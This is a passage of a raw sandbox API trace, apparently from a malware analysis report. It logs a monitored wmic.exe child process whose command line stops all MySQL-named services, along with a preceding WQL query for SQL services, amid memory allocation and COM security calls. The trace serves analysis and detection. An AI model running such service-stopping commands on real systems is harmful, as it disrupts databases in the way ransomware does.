malloc (_Size=0x18) returned 0x3b9b40 [0247.723] malloc (_Size=0x18) returned 0x3b9b60 [0247.723] malloc (_Size=0x18) returned 0x3b9b80 [0247.723] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d21390, strNetworkResource="\\\\XDUWTFONO\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff3929d0 | out: ppNamespace=0xff3929d0*=0x1d33b28) returned 0x0 [0247.727] free (_Block=0x3b9b80) [0247.727] free (_Block=0x3b9b60) [0247.727] free (_Block=0x3b9b40) [0247.727] CoSetProxyBlanket (pProxy=0x1d33b28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0247.727] free (_Block=0x3bd560) [0247.727] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0247.728] ??0CHString@@QEAA@XZ () returned 0x26f318 [0247.728] GetCurrentThreadId () returned 0x890 [0247.728] malloc (_Size=0x70) returned 0x3bcf50 [0247.728] malloc (_Size=0x50) returned 0x3bcfd0 [0247.728] malloc (_Size=0x50) returned 0x3bd030 [0247.728] malloc (_Size=0x70) returned 0x3bd090 [0247.728] malloc (_Size=0x70) returned 0x3bd110 [0247.728] malloc (_Size=0x48) returned 0x3bd190 [0247.728] malloc (_Size=0x18) returned 0x3b9b40 [0247.728] lstrlenA (lpString="") returned 0 [0247.728] malloc (_Size=0x2) returned 0x3b6a00 [0247.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff32314c, cbMultiByte=-1, lpWideCharStr=0x3b6a00, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0247.728] free (_Block=0x3b6a00) [0247.728] malloc (_Size=0x70) returned 0x3bd1e0 [0247.728] malloc (_Size=0x48) returned 0x3bd260 [0247.728] malloc (_Size=0x18) returned 0x3b9b60 [0247.728] free (_Block=0x3b9b40) [0247.728] IWbemServices:GetObject (in: This=0x1d33b28, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x26f348*=0x0, ppCallResult=0x0 | out: ppObject=0x26f348*=0x1d5c030, ppCallResult=0x0) returned 0x0 [0247.747] malloc (_Size=0x18) returned 0x3b9b40 [0247.747] IWbemClassObject:GetMethod (in: This=0x1d5c030, wszName="stopservice", lFlags=0, ppInSignature=0x26f340, ppOutSignature=0x26f358 | out: ppInSignature=0x26f340*=0x0, ppOutSignature=0x26f358*=0x1d5c530) returned 0x0 [0247.747] free (_Block=0x3b9b40) [0247.747] IUnknown:Release (This=0x1d5c530) returned 0x0 [0247.747] IUnknown:Release (This=0x1d5c030) returned 0x0 [0247.747] ??0CHString@@QEAA@XZ () returned 0x26f160 [0247.747] GetCurrentThreadId () returned 0x890 [0247.747] malloc (_Size=0x18) returned 0x3b9b40 [0247.747] lstrlenA (lpString="") returned 0 [0247.747] malloc (_Size=0x2) returned 0x3b6a00 [0247.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff32314c, cbMultiByte=-1, lpWideCharStr=0x3b6a00, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0247.747] free (_Block=0x3b6a00) [0247.747] malloc (_Size=0x18) returned 0x3b9b80 [0247.748] lstrlenA (lpString="") returned 0 [0247.748] malloc (_Size=0x2) returned 0x3b6a00 [0247.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff32314c, cbMultiByte=-1, lpWideCharStr=0x3b6a00, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0247.748] free (_Block=0x3b6a00) [0247.748] malloc (_Size=0x18) returned 0x3b9ba0 [0247.748] free (_Block=0x3b9b80) [0247.748] malloc (_Size=0x18) returned 0x3b9b80 [0247.748] lstrlenA (lpString="SELECT * FROM ") returned 14 [0247.748] malloc (_Size=0x1e) returned 0x3bd2b0 [0247.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff324a40, cbMultiByte=-1, lpWideCharStr=0x3bd2b0, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0247.748] free (_Block=0x3bd2b0) [0247.748] malloc (_Size=0x18) returned 0x3bd520 [0247.748] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0247.748] SysStringLen (param_1="Win32_Service") returned 0xd [0247.748] free (_Block=0x3b9b80) [0247.748] malloc (_Size=0x18) returned 0x3b9b80 [0247.749] malloc (_Size=0x18) returned 0x3bd540 [0247.749] lstrlenA (lpString=" WHERE ") returned 7 [0247.749] malloc (_Size=0x10) returned 0x3bd560 [0247.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff323e20, cbMultiByte=-1, lpWideCharStr=0x3bd560, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0247.749] free (_Block=0x3bd560) [0247.749] malloc (_Size=0x18) returned 0x3bd560 [0247.749] SysStringLen (param_1=" WHERE ") returned 0x7 [0247.749] SysStringLen (param_1="name like '%%SQL%%'") returned 0x13 [0247.749] malloc (_Size=0x18) returned 0x3bd580 [0247.749] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0247.749] SysStringLen (param_1=" WHERE name like '%%SQL%%'") returned 0x1a [0247.749] free (_Block=0x3bd520) [0247.749] free (_Block=0x3bd560) [0247.749] free (_Block=0x3bd540) [0247.749] free (_Block=0x3b9b80) [0247.749] malloc (_Size=0x18) returned 0x3b9b80 [0247.750] IWbemServices:ExecQuery (in: This=0x1d33b28, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%SQL%%'", lFlags=48, pCtx=0x0, ppEnum=0x26f148 | out: ppEnum=0x26f148*=0x1d33c28) returned 0x0 [0247.807] free (_Block=0x3b9b80) [0247.808] CoSetProxyBlanket (pProxy=0x1d33c28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0247.810] IEnumWbemClassObject:Next (in: This=0x1d33c28, lTimeout=-1, uCount=0x1, apObjects=0x26f150, puReturned=0x26f2d8 | out: apObjects=0x26f150*=0x0, puReturned=0x26f2d8*=0x0) returned 0x1 [0248.156] IUnknown:Release (This=0x1d33c28) returned 0x0 [0248.158] free (_Block=0x3bd580) [0248.158] free (_Block=0x3b9ba0) [0248.158] free (_Block=0x3b9b40) [0248.158] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0248.158] free (_Block=0x3b9b60) [0248.158] free (_Block=0x3bd190) [0248.158] free (_Block=0x3bd110) [0248.158] free (_Block=0x3bd090) [0248.158] free (_Block=0x3bd030) [0248.158] free (_Block=0x3bcfd0) [0248.158] free (_Block=0x3bd260) [0248.158] free (_Block=0x3bd1e0) [0248.158] free (_Block=0x3bcf50) [0248.159] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0248.159] GetCurrentThreadId () returned 0x890 [0248.159] ??0CHString@@QEAA@PEBG@Z () returned 0x26f668 [0248.159] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x26f668 [0248.159] malloc (_Size=0x800) returned 0x3bdcf0 [0248.159] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x3bdcf0, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0248.159] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0248.159] malloc (_Size=0x1c) returned 0x3bcf50 [0248.159] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x3bcf50, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0248.159] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 27 [0248.159] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0248.160] free (_Block=0x3bcf50) [0248.160] free (_Block=0x3bdcf0) [0248.160] ??1CHString@@QEAA@XZ () returned 0x3f5a6701 [0248.160] WbemLocator:IUnknown:Release (This=0x1d33b28) returned 0x0 [0248.161] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0248.161] _kbhit () returned 0x0 [0248.162] free (_Block=0x3bcf30) [0248.162] free (_Block=0x3b99a0) [0248.162] free (_Block=0x3b9980) [0248.162] free (_Block=0x3b9960) [0248.162] free (_Block=0x3b9440) [0248.162] free (_Block=0x3b7090) [0248.162] free (_Block=0x3b7120) [0248.162] free (_Block=0x3bcea0) [0248.162] free (_Block=0x3bcf00) [0248.162] free (_Block=0x3b9a40) [0248.162] free (_Block=0x3b9a60) [0248.162] free (_Block=0x3b6e50) [0248.162] free (_Block=0x3bd4a0) [0248.163] free (_Block=0x3b9a80) [0248.163] free (_Block=0x3b9ae0) [0248.163] free (_Block=0x3bd420) [0248.163] free (_Block=0x3bd3a0) [0248.163] free (_Block=0x3b9ac0) [0248.163] free (_Block=0x3b9aa0) [0248.163] free (_Block=0x3b9b00) [0248.163] free (_Block=0x3bd340) [0248.163] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0248.163] free (_Block=0x3bce10) [0248.163] free (_Block=0x3b99e0) [0248.163] free (_Block=0x3bced0) [0248.163] free (_Block=0x3b9a20) [0248.163] free (_Block=0x3b8600) [0248.163] free (_Block=0x3b9a00) [0248.163] free (_Block=0x3b99c0) [0248.163] free (_Block=0x3b7f50) [0248.163] free (_Block=0x3b6960) [0248.163] free (_Block=0x3b69b0) [0248.163] free (_Block=0x3b9b20) [0248.163] free (_Block=0x3b6a70) [0248.163] free (_Block=0x3b6e30) [0248.164] free (_Block=0x3b8040) [0248.164] free (_Block=0x3b6e10) [0248.164] free (_Block=0x3b8000) [0248.164] free (_Block=0x3b6db0) [0248.164] free (_Block=0x3b6dd0) [0248.164] free (_Block=0x3b6c90) [0248.164] free (_Block=0x3b6cb0) [0248.164] free (_Block=0x3b6c30) [0248.164] free (_Block=0x3b6c50) [0248.164] free (_Block=0x3b6cf0) [0248.164] free (_Block=0x3b6d10) [0248.164] free (_Block=0x3b6d50) [0248.164] free (_Block=0x3b6d70) [0248.164] free (_Block=0x3b6b70) [0248.164] free (_Block=0x3b6b90) [0248.164] free (_Block=0x3b6b10) [0248.164] free (_Block=0x3b6b30) [0248.165] free (_Block=0x3b6bd0) [0248.165] free (_Block=0x3b6bf0) [0248.165] free (_Block=0x3b6ab0) [0248.165] free (_Block=0x3b6ad0) [0248.165] free (_Block=0x3b6a20) [0248.165] free (_Block=0x3b7fa0) [0248.165] free (_Block=0x3b6ea0) [0248.165] WbemLocator:IUnknown:Release (This=0x1d21390) returned 0x2 [0248.165] WbemLocator:IUnknown:Release (This=0x1d33a98) returned 0x0 [0248.165] WbemLocator:IUnknown:Release (This=0x1d21390) returned 0x1 [0248.165] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0248.165] WbemLocator:IUnknown:Release (This=0x1d21390) returned 0x0 [0248.166] free (_Block=0x3b98e0) [0248.166] free (_Block=0x3b9900) [0248.166] free (_Block=0x3b8540) [0248.166] free (_Block=0x3b9920) [0248.166] free (_Block=0x3b9940) [0248.166] free (_Block=0x3b8580) [0248.166] free (_Block=0x3b9760) [0248.166] free (_Block=0x3b9780) [0248.166] free (_Block=0x3b83c0) [0248.166] free (_Block=0x3b97a0) [0248.166] free (_Block=0x3b97c0) [0248.166] free (_Block=0x3b8400) [0248.166] free (_Block=0x3b96e0) [0248.166] free (_Block=0x3b9700) [0248.166] free (_Block=0x3b8340) [0248.166] free (_Block=0x3b9720) [0248.167] free (_Block=0x3b9740) [0248.167] free (_Block=0x3b8380) [0248.167] free (_Block=0x3b9860) [0248.167] free (_Block=0x3b9880) [0248.167] free (_Block=0x3b84c0) [0248.167] free (_Block=0x3b98a0) [0248.167] free (_Block=0x3b98c0) [0248.167] free (_Block=0x3b8500) [0248.167] free (_Block=0x3b9660) [0248.167] free (_Block=0x3b9680) [0248.167] free (_Block=0x3b82c0) [0248.167] free (_Block=0x3b96a0) [0248.167] free (_Block=0x3b96c0) [0248.167] free (_Block=0x3b8300) [0248.167] free (_Block=0x3b97e0) [0248.168] free (_Block=0x3b9800) [0248.168] free (_Block=0x3b8440) [0248.168] free (_Block=0x3b9820) [0248.168] free (_Block=0x3b9840) [0248.168] free (_Block=0x3b8480) [0248.168] free (_Block=0x3b95a0) [0248.168] free (_Block=0x3b95c0) [0248.168] free (_Block=0x3b8200) [0248.168] free (_Block=0x3b9460) [0248.168] free (_Block=0x3b9480) [0248.168] free (_Block=0x3b80c0) [0248.168] free (_Block=0x3b9420) [0248.168] free (_Block=0x3b9400) [0248.168] free (_Block=0x3b8080) [0248.168] free (_Block=0x3b94e0) [0248.168] free (_Block=0x3b9500) [0248.168] free (_Block=0x3b8140) [0248.169] free (_Block=0x3b95e0) [0248.169] free (_Block=0x3b9600) [0248.169] free (_Block=0x3b8240) [0248.169] free (_Block=0x3b94a0) [0248.169] free (_Block=0x3b94c0) [0248.169] free (_Block=0x3b8100) [0248.169] free (_Block=0x3b9520) [0248.169] free (_Block=0x3b9540) [0248.169] free (_Block=0x3b8180) [0248.169] free (_Block=0x3b9560) [0248.169] free (_Block=0x3b9580) [0248.169] free (_Block=0x3b81c0) [0248.169] free (_Block=0x3b9620) [0248.169] free (_Block=0x3b9640) [0248.169] free (_Block=0x3b8280) [0248.170] CoUninitialize () [0248.207] exit (_Code=0) [0248.207] free (_Block=0x3bcd30) [0248.207] free (_Block=0x3b7f10) [0248.207] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0248.207] free (_Block=0x3b6f30) [0248.208] free (_Block=0x3b6a90) [0248.208] free (_Block=0x3b7ed0) [0248.208] free (_Block=0x3b7e90) [0248.208] free (_Block=0x3b7e40) [0248.208] free (_Block=0x3b7e00) [0248.208] free (_Block=0x3b5ac0) [0248.208] free (_Block=0x3b7d80) [0248.208] free (_Block=0x3b5a80) [0248.208] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0248.208] free (_Block=0x3b85c0) Thread: id = 175 os_tid = 0xbac Thread: id = 176 os_tid = 0xb9c Thread: id = 177 os_tid = 0xba4 Thread: id = 178 os_tid = 0x74c Thread: id = 179 os_tid = 0xbe0 Process: id = "21" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x12d66000" os_pid = "0xb90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 181 os_tid = 0x83c [0248.376] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f7d0 | out: lpSystemTimeAsFileTime=0x16f7d0*(dwLowDateTime=0xa9bf8f50, dwHighDateTime=0x1d61d49)) [0248.376] GetCurrentProcessId () returned 0xb90 [0248.376] GetCurrentThreadId () returned 0x83c [0248.376] GetTickCount () returned 0x1167dd8 [0248.376] QueryPerformanceCounter (in: lpPerformanceCount=0x16f7d8 | out: lpPerformanceCount=0x16f7d8*=36854966416) returned 1 [0248.380] GetModuleHandleW (lpModuleName=0x0) returned 0xff690000 [0248.381] __set_app_type (_Type=0x1) [0248.381] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff6dced0) returned 0x0 [0248.381] __wgetmainargs (in: _Argc=0xff702380, _Argv=0xff702390, _Env=0xff702388, _DoWildCard=0, _StartInfo=0xff70239c | out: _Argc=0xff702380, _Argv=0xff702390, _Env=0xff702388) returned 0 [0248.381] ??0CHString@@QEAA@XZ () returned 0xff702ab0 [0248.382] malloc (_Size=0x30) returned 0x3c5a80 [0248.382] malloc (_Size=0x70) returned 0x3c7d90 [0248.382] malloc (_Size=0x50) returned 0x3c5ac0 [0248.382] malloc (_Size=0x30) returned 0x3c7e10 [0248.382] malloc (_Size=0x48) returned 0x3c7e50 [0248.382] malloc (_Size=0x30) returned 0x3c7ea0 [0248.382] malloc (_Size=0x30) returned 0x3c7ee0 [0248.382] ??0CHString@@QEAA@XZ () returned 0xff702f58 [0248.382] malloc (_Size=0x30) returned 0x3c7f20 [0248.382] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0248.382] SetConsoleCtrlHandler (HandlerRoutine=0xff6d5724, Add=1) returned 1 [0248.382] _onexit (_Func=0xff6ef378) returned 0xff6ef378 [0248.382] _onexit (_Func=0xff6ef490) returned 0xff6ef490 [0248.383] _onexit (_Func=0xff6ef4d0) returned 0xff6ef4d0 [0248.383] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0248.383] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0248.388] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0248.399] CoCreateInstance (in: rclsid=0xff6973a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff697370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff702940 | out: ppv=0xff702940*=0x1cf1390) returned 0x0 [0248.411] GetCurrentProcess () returned 0xffffffffffffffff [0248.411] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x16f5a0 | out: TokenHandle=0x16f5a0*=0xf4) returned 1 [0248.411] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16f598 | out: TokenInformation=0x0, ReturnLength=0x16f598) returned 0 [0248.411] malloc (_Size=0x118) returned 0x3c6970 [0248.411] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x3c6970, TokenInformationLength=0x118, ReturnLength=0x16f598 | out: TokenInformation=0x3c6970, ReturnLength=0x16f598) returned 1 [0248.411] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x3c6970*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1041255799, Attributes=0x7ef0), (Luid.LowPart=0x0, Luid.HighPart=3964768, Attributes=0x0), (Luid.LowPart=0x690057, Luid.HighPart=6553710, Attributes=0x77006f), (Luid.LowPart=0x790053, Luid.HighPart=7602291, Attributes=0x6d0065), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x6f0050, Luid.HighPart=6619255, Attributes=0x530072))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0248.411] free (_Block=0x3c6970) [0248.411] CloseHandle (hObject=0xf4) returned 1 [0248.412] malloc (_Size=0x40) returned 0x3c7f60 [0248.412] malloc (_Size=0x40) returned 0x3c6970 [0248.412] malloc (_Size=0x40) returned 0x3c69c0 [0248.412] malloc (_Size=0x20a) returned 0x3c6a10 [0248.412] GetSystemDirectoryW (in: lpBuffer=0x3c6a10, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0248.412] free (_Block=0x3c6a10) [0248.412] malloc (_Size=0x18) returned 0x3c7fb0 [0248.412] malloc (_Size=0x18) returned 0x3c6a10 [0248.412] malloc (_Size=0x18) returned 0x3c6a30 [0248.412] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0248.412] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0248.412] free (_Block=0x3c7fb0) [0248.412] free (_Block=0x3c6a10) [0248.413] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0248.413] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0248.413] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0248.414] FreeLibrary (hLibModule=0x77940000) returned 1 [0248.414] free (_Block=0x3c6a30) [0248.414] _vsnwprintf (in: _Buffer=0x3c69c0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x16f1c8 | out: _Buffer="ms_409") returned 6 [0248.414] malloc (_Size=0x20) returned 0x3c6a10 [0248.414] GetComputerNameW (in: lpBuffer=0x3c6a10, nSize=0x16f5a0 | out: lpBuffer="XDUWTFONO", nSize=0x16f5a0) returned 1 [0248.414] lstrlenW (lpString="XDUWTFONO") returned 9 [0248.415] malloc (_Size=0x14) returned 0x3c7fb0 [0248.415] lstrlenW (lpString="XDUWTFONO") returned 9 [0248.415] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x16f598 | out: lpNameBuffer=0x0, nSize=0x16f598) returned 0x7fffffde000 [0248.416] GetLastError () returned 0xea [0248.416] malloc (_Size=0x40) returned 0x3c6a40 [0248.416] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3c6a40, nSize=0x16f598 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16f598) returned 0x1 [0248.416] lstrlenW (lpString="") returned 0 [0248.416] lstrlenW (lpString="XDUWTFONO") returned 9 [0248.416] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0248.419] lstrlenW (lpString=".") returned 1 [0248.419] lstrlenW (lpString="XDUWTFONO") returned 9 [0248.419] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0248.419] lstrlenW (lpString="LOCALHOST") returned 9 [0248.419] lstrlenW (lpString="XDUWTFONO") returned 9 [0248.419] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0248.419] lstrlenW (lpString="XDUWTFONO") returned 9 [0248.419] lstrlenW (lpString="XDUWTFONO") returned 9 [0248.419] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0248.419] free (_Block=0x3c7fb0) [0248.419] lstrlenW (lpString="XDUWTFONO") returned 9 [0248.420] malloc (_Size=0x14) returned 0x3c7fb0 [0248.420] lstrlenW (lpString="XDUWTFONO") returned 9 [0248.420] lstrlenW (lpString="XDUWTFONO") returned 9 [0248.420] malloc (_Size=0x14) returned 0x3c6a90 [0248.420] lstrlenW (lpString="XDUWTFONO") returned 9 [0248.420] malloc (_Size=0x8) returned 0x3c6ab0 [0248.420] malloc (_Size=0x18) returned 0x3c6ad0 [0248.420] malloc (_Size=0x30) returned 0x3c6af0 [0248.420] malloc (_Size=0x18) returned 0x3c6b30 [0248.420] SysStringLen (param_1="IDENTIFY") returned 0x8 [0248.420] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0248.420] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0248.420] SysStringLen (param_1="IDENTIFY") returned 0x8 [0248.420] malloc (_Size=0x30) returned 0x3c6b50 [0248.420] malloc (_Size=0x18) returned 0x3c6b90 [0248.420] SysStringLen (param_1="IMPERSONATE") returned 0xb [0248.420] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0248.420] SysStringLen (param_1="IMPERSONATE") returned 0xb [0248.420] SysStringLen (param_1="IDENTIFY") returned 0x8 [0248.420] SysStringLen (param_1="IDENTIFY") returned 0x8 [0248.420] SysStringLen (param_1="IMPERSONATE") returned 0xb [0248.421] malloc (_Size=0x30) returned 0x3c6bb0 [0248.421] malloc (_Size=0x18) returned 0x3c6bf0 [0248.421] SysStringLen (param_1="DELEGATE") returned 0x8 [0248.421] SysStringLen (param_1="IDENTIFY") returned 0x8 [0248.421] SysStringLen (param_1="DELEGATE") returned 0x8 [0248.421] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0248.421] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0248.421] SysStringLen (param_1="DELEGATE") returned 0x8 [0248.421] malloc (_Size=0x30) returned 0x3c6c10 [0248.421] malloc (_Size=0x18) returned 0x3c6c50 [0248.421] malloc (_Size=0x30) returned 0x3c6c70 [0248.421] malloc (_Size=0x18) returned 0x3c6cb0 [0248.421] SysStringLen (param_1="NONE") returned 0x4 [0248.421] SysStringLen (param_1="DEFAULT") returned 0x7 [0248.421] SysStringLen (param_1="DEFAULT") returned 0x7 [0248.421] SysStringLen (param_1="NONE") returned 0x4 [0248.421] malloc (_Size=0x30) returned 0x3c6cd0 [0248.421] malloc (_Size=0x18) returned 0x3c6d10 [0248.421] SysStringLen (param_1="CONNECT") returned 0x7 [0248.421] SysStringLen (param_1="DEFAULT") returned 0x7 [0248.421] malloc (_Size=0x30) returned 0x3c6d30 [0248.421] malloc (_Size=0x18) returned 0x3c6d70 [0248.421] SysStringLen (param_1="CALL") returned 0x4 [0248.422] SysStringLen (param_1="DEFAULT") returned 0x7 [0248.422] SysStringLen (param_1="CALL") returned 0x4 [0248.422] SysStringLen (param_1="CONNECT") returned 0x7 [0248.422] malloc (_Size=0x30) returned 0x3c6d90 [0248.422] malloc (_Size=0x18) returned 0x3c6dd0 [0248.422] SysStringLen (param_1="PKT") returned 0x3 [0248.422] SysStringLen (param_1="DEFAULT") returned 0x7 [0248.422] SysStringLen (param_1="PKT") returned 0x3 [0248.422] SysStringLen (param_1="NONE") returned 0x4 [0248.422] SysStringLen (param_1="NONE") returned 0x4 [0248.422] SysStringLen (param_1="PKT") returned 0x3 [0248.422] malloc (_Size=0x30) returned 0x3c6df0 [0248.422] malloc (_Size=0x18) returned 0x3c6e30 [0248.422] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0248.422] SysStringLen (param_1="DEFAULT") returned 0x7 [0248.422] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0248.422] SysStringLen (param_1="NONE") returned 0x4 [0248.422] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0248.422] SysStringLen (param_1="PKT") returned 0x3 [0248.422] SysStringLen (param_1="PKT") returned 0x3 [0248.422] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0248.422] malloc (_Size=0x30) returned 0x3c8000 [0248.423] malloc (_Size=0x18) returned 0x3c6e50 [0248.423] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0248.423] SysStringLen (param_1="DEFAULT") returned 0x7 [0248.423] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0248.423] SysStringLen (param_1="PKT") returned 0x3 [0248.423] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0248.423] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0248.423] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0248.423] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0248.423] malloc (_Size=0x30) returned 0x3c8040 [0248.423] malloc 